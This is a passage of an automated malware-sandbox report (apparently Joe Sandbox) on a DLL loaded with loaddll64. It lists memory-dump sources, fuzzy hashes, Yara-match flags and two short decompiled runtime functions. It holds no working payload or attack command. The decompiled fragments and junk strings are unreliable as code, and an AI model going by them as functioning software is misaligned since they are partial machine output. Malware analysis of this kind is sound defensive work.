                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865873047-0
                                                                                                        • Opcode ID: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                        • Instruction ID: 70720688c7123907eecbde990e879d966fd6b1fa01e12b8b3cc8cb263ae9a29d
                                                                                                        • Opcode Fuzzy Hash: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                        • Instruction Fuzzy Hash: D5D05E2292859181C610BB20EC4211E6320F7C23B0FA05721FABC03AE5CE2AD5018F04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC28901B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_t8 = __rax;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289011A0(_a16);
                                                                                                        				_t7 = E00007FFC7FFC28901B40(_t8, _a8, _a16, _t8); // executed
                                                                                                        				return _t7;
                                                                                                        			}





                                                                                                        0x7ffc28901b10
                                                                                                        0x7ffc28901b10
                                                                                                        0x7ffc28901b15
                                                                                                        0x7ffc28901b23
                                                                                                        0x7ffc28901b35
                                                                                                        0x7ffc28901b3e

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901B23
                                                                                                          • Part of subcall function 00007FFC28901B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901B6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 1444011685-0
                                                                                                        • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction ID: 46453a1bb2825b3416e37a0c64f9ad1b7d1350fb6403ff7a0c36074502ffec2e
                                                                                                        • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction Fuzzy Hash: B1D09E66A29A8581D584FB12FC9115AA764EBC87C1F805435FA8E42B6ADF28C1518F04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageRegisterTouch
                                                                                                        • String ID: Cannot register application window for multi-touch input$Error
                                                                                                        • API String ID: 490141109-480840240
                                                                                                        • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction ID: 2b977444f7f364db7f1cc1a4d857aa665fce99b2de5590091c96e5b5fe4099ea
                                                                                                        • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction Fuzzy Hash: DD51197590CB5A86EB50AB15FC4436A73A0FB84B96F400536DA8E43BE4DF3CE044DB24
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
                                                                                                        • API String ID: 0-1942796489
                                                                                                        • Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                        • Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
                                                                                                        • Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                        • Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: k$7'$D$G($Z<$o7=/$y
                                                                                                        • API String ID: 0-1865188920
                                                                                                        • Opcode ID: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                        • Instruction ID: fda8176045f72ddac869dc68b56e77e08c564191d5b4e17a01401cd0e62d40de
                                                                                                        • Opcode Fuzzy Hash: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                        • Instruction Fuzzy Hash: 2032E17150C7848FD798CFA9C58A65BFBE1FB88744F108A1DF486862A0D7F8D949CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC28909474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* _t36;
                                                                                                        				int _t40;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr _t53;
                                                                                                        				signed long long _t63;
                                                                                                        				long long _t66;
                                                                                                        				_Unknown_base(*)()* _t86;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        				signed long long _t94;
                                                                                                        				struct _EXCEPTION_POINTERS* _t100;
                                                                                                        
                                                                                                        				_t46 = __ecx;
                                                                                                        				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                        				_t91 = _t93 - 0x4f0;
                                                                                                        				_t94 = _t93 - 0x5f0;
                                                                                                        				_t63 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                        				_t53 = r8d;
                                                                                                        				_t45 = __ecx;
                                                                                                        				if (__ecx == 0xffffffff) goto 0x289094b3;
                                                                                                        				E00007FFC7FFC2890493C(_t36);
                                                                                                        				r8d = 0x98;
                                                                                                        				E00007FFC7FFC28906920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                        				r8d = 0x4d0;
                                                                                                        				E00007FFC7FFC28906920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                        				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                        				_t66 = _t91 + 0x10;
                                                                                                        				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                        				__imp__RtlCaptureContext();
                                                                                                        				r8d = 0;
                                                                                                        				__imp__RtlLookupFunctionEntry();
                                                                                                        				if (_t66 == 0) goto 0x28909546;
                                                                                                        				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                        				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                        				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                        				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                        				__imp__RtlVirtualUnwind();
                                                                                                        				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                        				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                        				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                        				_t40 = IsDebuggerPresent();
                                                                                                        				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                        				if (UnhandledExceptionFilter(_t100) != 0) goto 0x289095a8;
                                                                                                        				if (_t40 != 0) goto 0x289095a8;
                                                                                                        				if (_t45 == 0xffffffff) goto 0x289095a8;
                                                                                                        				return E00007FFC7FFC28903A70(E00007FFC7FFC2890493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                        			}
















                                                                                                        0x7ffc28909474
                                                                                                        0x7ffc28909474
                                                                                                        0x7ffc28909479
                                                                                                        0x7ffc28909482
                                                                                                        0x7ffc2890948a
                                                                                                        0x7ffc28909491
                                                                                                        0x7ffc2890949b
                                                                                                        0x7ffc289094a2
                                                                                                        0x7ffc289094a7
                                                                                                        0x7ffc289094ac
                                                                                                        0x7ffc289094ae
                                                                                                        0x7ffc289094ba
                                                                                                        0x7ffc289094c0
                                                                                                        0x7ffc289094cb
                                                                                                        0x7ffc289094d1
                                                                                                        0x7ffc289094db
                                                                                                        0x7ffc289094e4
                                                                                                        0x7ffc289094e8
                                                                                                        0x7ffc289094ed
                                                                                                        0x7ffc28909502
                                                                                                        0x7ffc28909505
                                                                                                        0x7ffc2890950e
                                                                                                        0x7ffc28909510
                                                                                                        0x7ffc28909523
                                                                                                        0x7ffc28909530
                                                                                                        0x7ffc28909539
                                                                                                        0x7ffc28909540
                                                                                                        0x7ffc2890954d
                                                                                                        0x7ffc2890955f
                                                                                                        0x7ffc28909563
                                                                                                        0x7ffc28909571
                                                                                                        0x7ffc28909575
                                                                                                        0x7ffc28909579
                                                                                                        0x7ffc28909583
                                                                                                        0x7ffc28909596
                                                                                                        0x7ffc2890959a
                                                                                                        0x7ffc2890959f
                                                                                                        0x7ffc289095ce

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1239891234-0
                                                                                                        • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction ID: f3ae1363acb6a4a341274bb7e115917a94debef2afe5d9b10de4a7b82cc1d4ee
                                                                                                        • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction Fuzzy Hash: 86318C32608B958AEB609F25EC402EE33A0FB8875AF440136EA9E43B94DF38C145CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >#3$??$Aw$F$J
                                                                                                        • API String ID: 0-2784440385
                                                                                                        • Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                        • Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
                                                                                                        • Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                        • Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$9`^p$>S1$@K$<
                                                                                                        • API String ID: 0-904861090
                                                                                                        • Opcode ID: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                        • Instruction ID: d0ca11fee3017775904e89b4535bcf8825016c76ce67da6f48249d0445d1abfd
                                                                                                        • Opcode Fuzzy Hash: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                        • Instruction Fuzzy Hash: BC12E37150078CDBDBACCF68C88A6DD3FB1FB443A4F605219F942962A0D7B5D989CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "4$f_$fzT$$
                                                                                                        • API String ID: 0-2251851231
                                                                                                        • Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                        • Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
                                                                                                        • Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                        • Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CX$[n$\$eI$E$8
                                                                                                        • API String ID: 0-2019653245
                                                                                                        • Opcode ID: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                        • Instruction ID: b0bde2b46dd9974091b147c1be75073ae13835eaf58c76366964caef907b3f92
                                                                                                        • Opcode Fuzzy Hash: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                        • Instruction Fuzzy Hash: 4E318EB190074E8FDB44CF64C48A5CE7FB0FB68798F204618E859A6250D3B896A4CBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $$$|nV
                                                                                                        • API String ID: 0-3281042611
                                                                                                        • Opcode ID: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                        • Instruction ID: 0fceca5626e055d2fbf750ad096c81a0ae15a929736b2a3d881e47323bd06dff
                                                                                                        • Opcode Fuzzy Hash: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                        • Instruction Fuzzy Hash: DA72FA71A0474C8BDF58CFA8C04AADDBBF5FB54344F00412DED4AAB298D7B4A91ACB45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: R7i$VG$]>S$u`
                                                                                                        • API String ID: 0-1600827667
                                                                                                        • Opcode ID: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                        • Instruction ID: e69c950c419dafbc2894b984fb63416e0ad2d3a581be44541dc433b6a47a3fb9
                                                                                                        • Opcode Fuzzy Hash: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                        • Instruction Fuzzy Hash: DC32F1709097C88BDBF8DF24C8897DD7BE0FF48344F50515A984E9A694CBB86689CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BB$z<$.$4
                                                                                                        • API String ID: 0-1591233792
                                                                                                        • Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                        • Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
                                                                                                        • Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                        • Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Jx$M[$jP$xy
                                                                                                        • API String ID: 0-882801676
                                                                                                        • Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                        • Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
                                                                                                        • Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                        • Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &$@2$Jn$^
                                                                                                        • API String ID: 0-1816242221
                                                                                                        • Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                        • Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
                                                                                                        • Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                        • Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0e$64$@$o=
                                                                                                        • API String ID: 0-3194635012
                                                                                                        • Opcode ID: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                        • Instruction ID: 43be15bbb58683b0ec8bcd6d9d0e20e10858889a9d955228704270f701235499
                                                                                                        • Opcode Fuzzy Hash: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                        • Instruction Fuzzy Hash: 3B91E47051068C9FDB89DF24D88AADD3BB0FF58348F815319FC8AA6290C778D589CB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;$36H$Yfr4$kWa^
                                                                                                        • API String ID: 0-3599472112
                                                                                                        • Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                        • Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
                                                                                                        • Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                        • Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?M$B $bN$u
                                                                                                        • API String ID: 0-4267052880
                                                                                                        • Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                        • Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
                                                                                                        • Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                        • Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ($U$wU
                                                                                                        • API String ID: 0-2031152664
                                                                                                        • Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                        • Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
                                                                                                        • Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                        • Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: y$!d.#$U
                                                                                                        • API String ID: 0-1702114524
                                                                                                        • Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                        • Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
                                                                                                        • Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                        • Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
